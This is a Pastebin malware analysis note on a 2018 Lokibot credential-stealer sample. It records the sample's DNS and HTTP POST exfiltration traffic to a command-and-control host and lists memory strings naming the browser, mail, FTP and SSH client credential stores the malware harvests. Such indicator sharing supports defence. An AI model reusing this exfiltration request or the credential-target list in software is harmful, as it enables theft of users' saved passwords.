API tools faq
paste
Advertisement
Neonprimetime

2018-04-12 lokibot sample

Neonprimetime
Apr 12th, 2018
548
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.24 KB | None | 0 0
raw download clone embed print report
  1. just found on recent submissions on hybrid analysis
  2. https://www.reverse.it/sample/c2678090c55db4f1b39e4d8987b6f3ca6651615fcaae46452f08cad1e8fc6291?environmentId=100
  3. #lokibot
  4.  
  5. ------------
  6.  
  7. closes itself and re-opens another executable with the same name
  8.  
  9. ------------
  10. interesting packet captures
  11. ------------
  12. 1.) Domain Name System (response)
  13. Queries
  14. kox.termofoc.gr: type A, class IN
  15. Answers
  16. Address: 198.12.153.138
  17. 2.) POST /oki/fre.php HTTP/1.0
  18. User-Agent: Mozilla/4.08 (Charon; Inferno)
  19. Host: kox.termofoc.gr
  20. Accept: */*
  21. Content-Type: application/octet-stream
  22. Content-Encoding: binary
  23. Content-Key: E5CE4ED4
  24. Content-Length: 227
  25. Connection: close
  26.  
  27. ..'.......ckav.ru.....[REDACTED USER ID] .......[REDACTED PC NAME].......[REDACTED PC NAME].....................k...........:.....0...2.7.1.8.4.5.3.1.A.2.C.7.0.B.8.D.E.A.0.4.0.E.E.7.....vQURz).....H......ht.ps8:/.w..rerv....it.log.n..`.
  28.  
  29.  
  30.  
  31. ------------
  32. interesting strings found in memory
  33. ------------
  34. 0x247168 (115): HTTP/1.0
  35. User-Agent: %s
  36. Host: %s
  37. Accept: */*
  38. Content-Type: application/octet-stream
  39. Content-Encoding: binary
  40. 0x247fb0 (231): i/fre.php HTTP/1.0
  41. User-Agent: Mozilla/4.08 (Charon; Inferno)
  42. Host: kox.termofoc.gr
  43. Accept: */*
  44. Content-Type: application/octet-stream
  45. Content-Encoding: binary
  46. 0x415524 (26): Comodo\Dragon
  47. 0x415540 (44): MapleStudio\ChromePlus
  48. 0x415570 (26): Google\Chrome
  49. 0x4155d4 (26): Titan Browser
  50. 0x4155fc (40): Yandex\YandexBrowser
  51. 0x415628 (40): Epic Privacy Browser
  52. 0x415654 (28): CocCoc\Browser
  53. 0x415684 (30): Comodo\Chromodo
  54. 0x4156b8 (26): Coowon\Coowon
  55. 0x4156d4 (30): Mustang Browser
  56. 0x4156f4 (36): 360Browser\Browser
  57. 0x41571c (40): CatalinaGroup\Citrio
  58. 0x415748 (34): Google\Chrome SxS
  59. 0x41578c (44): \Opera\Opera Next\data
  60. 0x4157bc (56): \Opera Software\Opera Stable
  61. 0x4157f8 (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
  62. 0x415860 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
  63. 0x415ba0 (62): %s\Mozilla\Firefox\profiles.ini
  64. 0x415be0 (60): %s\Mozilla\Firefox\Profiles\%s
  65. 0x415c20 (66): %s\Mozilla\SeaMonkey\profiles.ini
  66. 0x415c68 (64): %s\Mozilla\SeaMonkey\Profiles\%s
  67. 0x415cac (58): %s\Flock\Browser\profiles.ini
  68. 0x415ce8 (56): %s\Flock\Browser\Profiles\%s
  69. 0x415d24 (54): %s\Thunderbird\profiles.ini
  70. 0x415d5c (52): %s\Thunderbird\Profiles\%s
  71. 0x415d94 (48): %s\K-Meleon\profiles.ini
  72. 0x415dc8 (28): %s\K-Meleon\%s
  73. 0x415de8 (64): %s\Comodo\IceDragon\profiles.ini
  74. 0x415e30 (62): %s\Comodo\IceDragon\Profiles\%s
  75. 0x415e70 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
  76. 0x415ed0 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
  77. 0x415f2c (46): %s\Postbox\profiles.ini
  78. 0x415f5c (44): %s\Postbox\Profiles\%s
  79. 0x415f90 (74): %s\8pecxstudios\Cyberfox\profiles.ini
  80. 0x415fe0 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
  81. 0x416030 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
  82. 0x416090 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
  83. 0x4160f0 (50): %s\FossaMail\profiles.ini
  84. 0x416124 (48): %s\FossaMail\Profiles\%s
  85. 0x416158 (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
  86. 0x417120 (28): IMAP Password2
  87. 0x417140 (28): NNTP Password2
  88. 0x417160 (36): HTTPMail Password2
  89. 0x417188 (28): SMTP Password2
  90. 0x4171a8 (26): POP3 Password
  91. 0x4173d0 (30): %s\32BitFtp.TMP
  92. 0x4173f0 (30): %s\32BitFtp.ini
  93. 0x417410 (54): %s\Estsoft\ALFTP\ESTdb2.dat
  94. 0x417448 (22): %s\site.xml
  95. 0x417460 (46): %s\BitKinex\bitkinex.ds
  96. 0x4174ac (30): LastUsedProfile
  97. 0x4174cc (56): Software\Bitvise\BvSshClient
  98. 0x417508 (40): %s\BlazeFtp\site.dat
  99. 0x417538 (72): Software\FlashPeak\BlazeFtp\Settings
  100. 0x417584 (24): LastPassword
  101. 0x4175b4 (22): LastAddress
  102. 0x417618 (88): Software\NCH Software\ClassicFTP\FTPAccounts
  103. 0x417694 (24): %s\Cyberduck
  104. 0x4176b0 (22): user.config
  105. 0x4176c8 (30): %s\iterate_GmbH
  106. 0x4176e8 (30): %s\EasyFTP\data
  107. 0x4181b8 (64): Software\9bis.com\KiTTY\Sessions
  108. 0x418200 (70): Software\SimonTatham\PuTTY\Sessions
  109. 0x418438 (22): %s\SmartFTP
  110. 0x418460 (44): %s\Staff-FTP\sites.ini
  111. 0x418490 (44): %s\Steed\bookmarks.txt
  112. 0x4184c0 (26): %s\SuperPutty
  113. 0x4189b0 (164):
  114.  
  115. aPLib v1.01 - the smaller the better :)
  116. Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
  117.  
  118. More information: http://www.ibsensoftware.com/
  119. 0x4a0074 (35): https://kox.termofoc.gr/oki/fre.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!